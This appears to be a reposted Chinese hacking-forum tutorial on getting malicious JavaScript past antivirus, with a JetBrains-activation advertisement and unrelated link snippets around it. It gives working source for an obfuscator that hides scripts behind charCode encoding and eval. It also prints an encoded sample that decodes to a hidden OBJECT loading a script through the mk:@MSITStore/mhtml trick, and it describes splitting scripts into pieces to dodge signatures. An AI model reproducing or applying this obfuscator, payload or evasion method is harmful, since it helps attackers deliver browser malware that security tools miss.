明日之后js免费脚本_超强免杀工具

明日之后js免费脚本_超强免杀工具 js脚本免杀工具免杀经验以及简单的分析文章作者:虫虫信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文所做的实验是以ah.js(冰狐的一个变种,附件中名为”病毒样本.txt”)为病毒样本进行的,其他js恶意代码没有测试。由于卡巴斯基对js的查杀力度比较大,再者我本机就安装了卡巴斯基,所以对其有少量额外的分析。菜鸟作品,难登大雅之堂,高手多多指教!^-^常规的思路就是将

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
 
js脚本免杀工具 免杀经验以及简单的分析


文章作者:虫虫
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com

本文所做的实验是以ah.js(冰狐的一个变种,附件中名为”病毒样本.txt”)为病毒样本进行的,其他js恶意代码没有测试。
由于卡巴斯基对js的查杀力度比较大,再者我本机就安装了卡巴斯基,所以对其有少量额外的分析。
菜鸟作品,难登大雅之堂,高手多多指教! ^-^

常规的思路就是将js编码以后使杀毒软件找不到特征码所以不报。本实验也是循了这一思路,所以并没有多少创新的地方。(要有创新点的话,后半部分的一个技巧可能算是一个.呵呵)
于是将js文件拆成几片,看看特征码在什么地方,然后修改。ccl不能拆开非pe文件,也不适合,所以都是手动来的。
但一开始我并没有这么做,我使用escape函数将这个js编码了,使用的时候再用unescape变回来,于是写了代码,但测试失败!(也许其他的杀毒监测不出来,但是卡巴不会)
想可能特征码还存在,于是将原文件每一个字符的ASCII读出来,然后再用String.fromCharCode编回来,这样肯定就不会有特征码了,因为只有一串串的数字,于是很得意的这么做了,然而,很意外的,卡巴马上把这个文件杀了!!!!

相当意外,难道卡巴是动态跟踪的?于是把病毒样本里的变量名换了,被杀!!难道他动态的监视每一个变量,一旦发现变量中有非法内容马上查杀?!再结合第一次实验,我几乎就确定是这么回事了,但是下面的实验又让我意外:

把病毒样本里的变量名换了,然后加入了几个中间变量,本来等待被卡巴杀掉,但是卡巴却把它放行了(附件中的 样本直接变形.txt).

于是重新思考了.[各位和我一样的小菜菜也一起想一下吧,高手莫笑]

卡巴斯基并没有那么智能去动态的跟踪每一个变量,他可能只是内嵌了一个脚本分析器,可以分析简单的脚本编码,所以以上的几个实验会有被杀的结果.然后卡巴也是特征码驱动的,于是, 样本直接变形.txt 会被放行.

这个思路的直接产物就是:附件中的”js变形免杀”这个东东,因为简单编码并不会绕过卡巴,但是将源码稍微改动后却可以通过.如果将二者结合一下呢? js变形免杀 就这么做的。大家可以看看他的代码。附件中还有他变形后的ah.js的代码”生成样本1.js”
呵呵,不要高兴,他被卡巴杀了,呵呵. 但是江民会放过他 (附件中有一个各类杀毒比较)

变形不够吧?于是写了 js变形免杀2 ,终于绕过了卡巴. 根据我以上的思路认为其他的恶意js通过这个工具变形后均可以免杀,但我没有做相关的测试,也希望看到这里的各位拿去测试一下,谢谢!

写的好啰嗦阿!!当作稿件发倒是能多赚点。呵呵。
下面是我觉得有点创新的地方。也是在测定特征码位置的时候想到的。
看一下附件的 js分片卡巴检测 ,发现了什么?呵呵

还是那个:将js文件拆成几片,看看特征码在什么地方,然后修改。由的时候拆成几片后都不报毒了,郁闷,得重新凑,因为把特征码拆开了,检测不到了。哈哈,猜到了吧?
我就把这几片分开来放,然后再另一个文件里使用
<script src=piece1.js></script>
<script src=piece2.js></script>
<script src=piece3.js></script>
把他们合起来~~~很有意思的绕过了杀毒~(附件有说明)

其实asp也可以阿,include不是吗?

好了,很啰嗦,写点什么时总要发挥投稿时1句话分5句说的精神~~哎~~

asp马的免杀呢?完全可以照上面的思路.但是我却没有写出对应的工具~自己劳动一下吧~

[个人感觉asp马的危害比js大(为什么?呵呵),所以只把js变形器给出了……js免杀,他调用的马可不一定免杀呶~]

为防止被杀毒查杀了,附件是加密的,密码是 est

增加:对附件代码的一点点提示
这是附件中对JS进行编码的核心代码:

CODE:
function change(){

  var s=new String(document.all.txt.value);

  var t=new String;

  var i;

  for (i=0;i<s.length;i++ ){

    t=t+(s.charCodeAt(i).toString())+”,”;}

  t=t.substr(t,t.length-1)

  t=’t=”‘+t+'”;/nt=eval(“String.fromCharCode(“+t+”)”);/ndocument.write(“<script>”+t+”<///script>”);’;

  document.all.txt.value=t;}

</script>
[Copy to clipboard]

这是使用该工具生成的一段代码:

CODE:
t=”71,73,70,56,57,97,32,13,10,118,97,114,32,71,73,70,56,57,97,61,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,71,73,70,56,57,97,61,71,73,70,56,57,97,46,115,117,98,115,116,114,105,110,103,40,48,44,71,73,70,56,57,97,46,108,97,115,116,73,110,100,101,120,79,102,40,39,47,39,41,41,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,79,66,74,69,67,84,32,87,105,100,116,104,61,48,32,72,101,105,103,104,116,61,48,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,116,121,112,101,61,34,116,101,120,116,47,120,45,115,99,114,105,112,116,108,101,116,34,32,100,97,116,97,61,34,109,107,58,37,52,48,77,83,73,84,83,116,111,114,101,37,51,65,109,104,116,109,108,37,51,65,99,37,51,65,92,92,37,50,69,109,104,116,37,50,49,39,43,71,73,70,56,57,97,43,39,37,50,102,49,46,106,115,58,58,47,37,50,51,34,62,60,47,79,66,74,69,67,84,62,39,41,59″;

t=eval(“String.fromCharCode(“+t+”)”);

document.write(“<script>”+t+”<//script>”);
[Copy to clipboard]

看起来其实也没有什么,就是将原来的js给变成ascii码,然后再用String.fromCharCode编回来。
但是这样一编将不同格式的,不同特征字的js代码变成了格式相同,特征字相似的js代码,使得生成的js的免杀修改特别方便,也方便了使用后面的js分片技巧来免杀,这是一点;
其次,你不觉得这个代码有点类似于exe文件的加壳吗?我们用工具将原js编码,然后通过转换以后再使用document.write(“<script>”+t+”<//script>”)使其恢复活性,很像是吧。本来打算把这个展开来分析一下,但是仔细考虑了一下发现这个好像没有很大的用途,最多用于保护代码~和免杀。asp也可以通过使用eval和execute来加壳一下,呵呵。(asp方面可以使劲考虑下阿,你可能 会有一个很大的发现啊!)

我也说了这个文章并没有什么技术性,实用性也不是很高。权当拿出来开拓开拓思路,高手莫笑,呵呵。

Code:

<title>虫虫的js变形工具</title>
<script>
function change(){

 var s=new String(document.all.txt.value);
 var t=new String;
 var i;
 for (i=0;i<s.length;i++ ){

  t=t+(s.charCodeAt(i).toString())+”,”;}
 t=t.substr(t,t.length-1)
 t=’t=”‘+t+'”;/nt=eval(“String.fromCharCode(“+t+”)”);/ndocument.write(“<script>”+t+”<///script>”);’;
 document.all.txt.value=t;}
</script>

<body style=”font-size:12px;”>
<center>
<span style=”font-size:20px;color:red;”>虫虫的JS变形工具</span><br>
将js的内容(不包含< script>标签)复制到下面的文本框中,点变形即可。
<textarea id=txt cols=80 rows=30></textarea><br>
<button οnclick=change()>变形</button>
</center>
</body>

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171520.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 单片机之IIC通信协议「建议收藏」

    单片机之IIC通信协议「建议收藏」概念I2C(IIC,Inter-IntegratedCircuit),两线式串行总线,由PHILIPS公司开发用于连接微控制器及其外围设备。它是由数据线SDA和时钟SCL构成的串行总线,可发送和接收数据。在CPU与被控IC之间、IC与IC之间进行双向传送,高速IIC总线一般可达400kbps以上。硬件IIC:硬件IIC速度比模拟快,并且可以用DMA。硬件IIC会自动匹配与从机的通信时序,…

  • 什么是友元类[通俗易懂]

    什么是友元类[通俗易懂]======================什么是友元类=======================     当一个类B成为了另外一个类A的“朋友”时,那么类A的私有和保护的数据成员就可以被类B访问。我们就把类B叫做类A的友元。=======================友元类能做什么=======================     友元类可以通过自己的方法来

  • Win10安装wget_linux wget安装

    Win10安装wget_linux wget安装安装下载点击下载依次如下:1.2、将下载好的wget.exe放到C:/windows/system32文件夹下3.3、在cmd中输入wget–version如下则成功:测试下载图片wgethttp://q1.xiongmaoya.com/2021/08/09/26045/1.jpg

    2022年10月17日
  • 计算机变异指标可以,变异系数公式_在EXCEL中怎样计算样本标准差和变异系数

    计算机变异指标可以,变异系数公式_在EXCEL中怎样计算样本标准差和变异系数一份excel的统计表模板,包含统计频数、最大值、最…一、公式详解1、统计频数:=Count(A:A)统计A列所有数值个数2、最大值:=Max(A:A)3、最小值:=Min(A:A)4、平均值:=Average(A:A)5、标准差:=STDEV.S(A:A)6、变异系数=标准差/平均值=STDEV.S(A:A)/average(A:A)7、修正系数:三、附件变异系数怎么算公式如下:扩展资料变异…

  • 微软E5账号OneDrive无法扩容解决方案(亲测有效)「建议收藏」

    微软E5账号OneDrive无法扩容解决方案(亲测有效)「建议收藏」E5账号OneDrive默认存储空间为1T,可通过以下方式进行扩容12如按照以上方法扩容失败,则本篇文章可能对您有帮助,请继续阅读1.下载安装SharePointOnlineManagementShell 官方下载地址: https://www.microsoft.com/zh-CN/download/details.aspx?id=355882.在SharePointOnlineManagementShell中输入以下命令1.Conn..

  • 回顾各种编码的创新和异同-MEPG2, MPEG4, H.264/AVC以及H.265/HEVC比较[通俗易懂]

    回顾各种编码的创新和异同-MEPG2, MPEG4, H.264/AVC以及H.265/HEVC比较[通俗易懂]1、宏块匹配像素精度:MPEG2中,运动估计的精度是1/2的像素,通过线性插值实现;                     H.264/AVC和MPEG4都可以支持1/4像素的精度.2、参考帧的数量:    MPEG2,MPEG4的P帧只能有一帧参考帧,B帧可以有两帧参考帧,H.264/AVC可以最多有15帧参考帧(创新之处),

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号